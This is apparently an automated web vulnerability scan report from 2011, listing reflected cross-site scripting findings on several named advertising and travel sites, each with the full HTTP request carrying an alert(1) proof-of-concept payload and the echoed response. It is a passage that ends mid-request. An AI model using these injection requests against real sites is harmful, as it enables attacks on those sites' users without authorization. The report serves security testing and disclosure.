Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://634454825056194218.contentcastsyndication.com/Csp/ [audience parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://634454825056194218.contentcastsyndication.com
Path:   /Csp/

Issue detail

The value of the audience request parameter is copied into the HTML document as plain text between tags. The payload 4a2a3<script>alert(1)</script>deca37907f3 was submitted in the audience parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Csp/?t=campaign&category=63&audience=Consumer4a2a3<script>alert(1)</script>deca37907f3&banner=Button_180x90_Image&lng=EN HTTP/1.1
Host: 634454825056194218.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 33946
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:41 GMT
Date: Fri, 30 Sep 2011 13:28:41 GMT
Connection: close

//instantiate CSP_GLOBAL if undefined
if (typeof(CSP_GLOBAL) == "undefined") {
   CSP_GLOBAL = {};

   (function($$) {
    (function() {
    var url = window.location.href;
    var key = "csp_p
...[SNIP]...
).length > 0) {
//ignore
}
else {
var options = { sku: "", t: "campaign", mf: "", lng: "1", locationId: "", cdsId: "", p: "", audience: "Consumer4a2a3<script>alert(1)</script>deca37907f3", banner: "Button_180x90_Image", category: "63" };
var appendpoint = document.getElementById("SPAN_" + spanId);
var instanceId = $$.getNextInlineElementNum();

...[SNIP]...

2.2. http://634454825056194218.contentcastsyndication.com/Csp/ [banner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://634454825056194218.contentcastsyndication.com
Path:   /Csp/

Issue detail

The value of the banner request parameter is copied into the HTML document as plain text between tags. The payload 7237d<script>alert(1)</script>fcc847b5c63 was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Csp/?t=campaign&category=63&audience=Consumer&banner=Button_180x90_Image7237d<script>alert(1)</script>fcc847b5c63&lng=EN HTTP/1.1
Host: 634454825056194218.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 33946
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:42 GMT
Date: Fri, 30 Sep 2011 13:28:42 GMT
Connection: close

//instantiate CSP_GLOBAL if undefined
if (typeof(CSP_GLOBAL) == "undefined") {
   CSP_GLOBAL = {};

   (function($$) {
    (function() {
    var url = window.location.href;
    var key = "csp_p
...[SNIP]...
//ignore
}
else {
var options = { sku: "", t: "campaign", mf: "", lng: "1", locationId: "", cdsId: "", p: "", audience: "Consumer", banner: "Button_180x90_Image7237d<script>alert(1)</script>fcc847b5c63", category: "63" };
var appendpoint = document.getElementById("SPAN_" + spanId);
var instanceId = $$.getNextInlineElementNum();
var _callbackObj = $.ext
...[SNIP]...

2.3. http://634454825056194218.contentcastsyndication.com/Csp/ [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://634454825056194218.contentcastsyndication.com
Path:   /Csp/

Issue detail

The value of the category request parameter is copied into the HTML document as plain text between tags. The payload 5fe5a<script>alert(1)</script>42f64329b8d was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Csp/?t=campaign&category=635fe5a<script>alert(1)</script>42f64329b8d&audience=Consumer&banner=Button_180x90_Image&lng=EN HTTP/1.1
Host: 634454825056194218.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 33946
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:41 GMT
Date: Fri, 30 Sep 2011 13:28:41 GMT
Connection: close

//instantiate CSP_GLOBAL if undefined
if (typeof(CSP_GLOBAL) == "undefined") {
   CSP_GLOBAL = {};

   (function($$) {
    (function() {
    var url = window.location.href;
    var key = "csp_p
...[SNIP]...
}
else {
var options = { sku: "", t: "campaign", mf: "", lng: "1", locationId: "", cdsId: "", p: "", audience: "Consumer", banner: "Button_180x90_Image", category: "635fe5a<script>alert(1)</script>42f64329b8d" };
var appendpoint = document.getElementById("SPAN_" + spanId);
var instanceId = $$.getNextInlineElementNum();
var _callbackObj = $.extend({}, callback
...[SNIP]...

2.4. http://634454825056194218.contentcastsyndication.com/Csp/ [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://634454825056194218.contentcastsyndication.com
Path:   /Csp/

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 610ad<script>alert(1)</script>d06e84a3b50 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Csp/?t=campaign610ad<script>alert(1)</script>d06e84a3b50&category=63&audience=Consumer&banner=Button_180x90_Image&lng=EN HTTP/1.1
Host: 634454825056194218.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 34028
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:40 GMT
Date: Fri, 30 Sep 2011 13:28:40 GMT
Connection: close

//instantiate CSP_GLOBAL if undefined
if (typeof(CSP_GLOBAL) == "undefined") {
   CSP_GLOBAL = {};

   (function($$) {
    (function() {
    var url = window.location.href;
    var key = "csp_p
...[SNIP]...
validateUrl, elementId);
}
});
});
}
}


$(document).ready(function() {
var currentType = "campaign610ad<script>alert(1)</script>d06e84a3b50";
if (currentType == "") currentType = "showcase";
$$.handleRequest.call();
$$.log("*** Type: " + currentType);
//no elements found - legacy embed

...[SNIP]...

2.5. http://ad.thewheelof.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.thewheelof.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7167f"><script>alert(1)</script>48a105b0edf was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x907167f"><script>alert(1)</script>48a105b0edf&section=217835 HTTP/1.1
Host: ad.thewheelof.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.golflink.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/html; charset=utf-8
Date: Fri, 30 Sep 2011 13:13:18 GMT
Content-Length: 739

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=32&size=728x907167f"><script>alert(1)</script>48a105b0edf&inv_code=217835&referrer=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=728x907167f"><script>alert(1)</script>48a105b0edf&s=217835&t=2" target="parent">
...[SNIP]...

2.6. http://ad.thewheelof.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.thewheelof.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5530'-alert(1)-'2a11e246bc was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=728x90b5530'-alert(1)-'2a11e246bc&section=217835 HTTP/1.1
Host: ad.thewheelof.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.golflink.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/html; charset=utf-8
Date: Fri, 30 Sep 2011 13:13:23 GMT
Content-Length: 665

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=32&size=728x90b5530'-alert(1)-'2a11e246bc&inv_code=217835&referrer=http://www.golflink.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D32%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90b5530%27-alert%281%29-%272a
...[SNIP]...

2.7. http://ad.thewheelof.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.thewheelof.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fed6'-alert(1)-'8b96419ac76 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=2178358fed6'-alert(1)-'8b96419ac76 HTTP/1.1
Host: ad.thewheelof.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.golflink.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/html; charset=utf-8
Date: Fri, 30 Sep 2011 13:13:33 GMT
Content-Length: 669

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=32&size=728x90&inv_code=2178358fed6'-alert(1)-'8b96419ac76&referrer=http://www.golflink.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D32%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D2178358fed6%27-alert%281%29-%2
...[SNIP]...

2.8. http://ad.thewheelof.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.thewheelof.com
Path:   /st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d46"><script>alert(1)</script>3043d8a1f6 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=21783572d46"><script>alert(1)</script>3043d8a1f6 HTTP/1.1
Host: ad.thewheelof.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.golflink.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/html; charset=utf-8
Date: Fri, 30 Sep 2011 13:13:29 GMT
Content-Length: 735

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=32&size=728x90&inv_code=21783572d46"><script>alert(1)</script>3043d8a1f6&referrer=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=728x90&s=21783572d46"><script>alert(1)</script>3043d8a1f6&t=2" target="parent">
...[SNIP]...

2.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f889b"-alert(1)-"8f048c0717a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=32&anprice=&ad_type=ad&ad_size=728x90&section=217835&f889b"-alert(1)-"8f048c0717a=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://ad.thewheelof.com/st?ad_type=iframe&ad_size=728x90&section=217835
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:13:12 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Fri, 30 Sep 2011 13:13:12 GMT
Pragma: no-cache
Content-Length: 4344
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=728x90&anmember=32&anprice=&f889b"-alert(1)-"8f048c0717a=1&s=217835&_salt=3027158730";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(r
...[SNIP]...

2.10. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 118b7'style%3d'x%3aexpression(alert(1))'243fb785c1c was submitted in the REST URL parameter 4. This input was echoed as 118b7'style='x:expression(alert(1))'243fb785c1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace118b7'style%3d'x%3aexpression(alert(1))'243fb785c1c/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12513
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace118b7'style='x:expression(alert(1))'243fb785c1c/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg'>
...[SNIP]...

2.11. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 36c9e'style%3d'x%3aexpression(alert(1))'d320ff599fd was submitted in the REST URL parameter 5. This input was echoed as 36c9e'style='x:expression(alert(1))'d320ff599fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore36c9e'style%3d'x%3aexpression(alert(1))'d320ff599fd/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:44 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12513
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore36c9e'style='x:expression(alert(1))'d320ff599fd/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg'>
...[SNIP]...

2.12. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/2c45d5ca-e317-11dd-b30b-cbea775a248d/URUGUAY-thumbnail.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b0a25'style%3d'x%3aexpression(alert(1))'fc84f4357da was submitted in the REST URL parameter 6. This input was echoed as b0a25'style='x:expression(alert(1))'fc84f4357da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore/b0a25'style%3d'x%3aexpression(alert(1))'fc84f4357da/URUGUAY-thumbnail.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12333
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore/b0a25'style='x:expression(alert(1))'fc84f4357da/URUGUAY-thumbnail.jpg'>
...[SNIP]...

2.13. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d370'style%3d'x%3aexpression(alert(1))'0da7e8f344f was submitted in the REST URL parameter 4. This input was echoed as 8d370'style='x:expression(alert(1))'0da7e8f344f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace8d370'style%3d'x%3aexpression(alert(1))'0da7e8f344f/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12511
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace8d370'style='x:expression(alert(1))'0da7e8f344f/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg'>
...[SNIP]...

2.14. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 28ddb'style%3d'x%3aexpression(alert(1))'506c04e974b was submitted in the REST URL parameter 5. This input was echoed as 28ddb'style='x:expression(alert(1))'506c04e974b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore28ddb'style%3d'x%3aexpression(alert(1))'506c04e974b/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
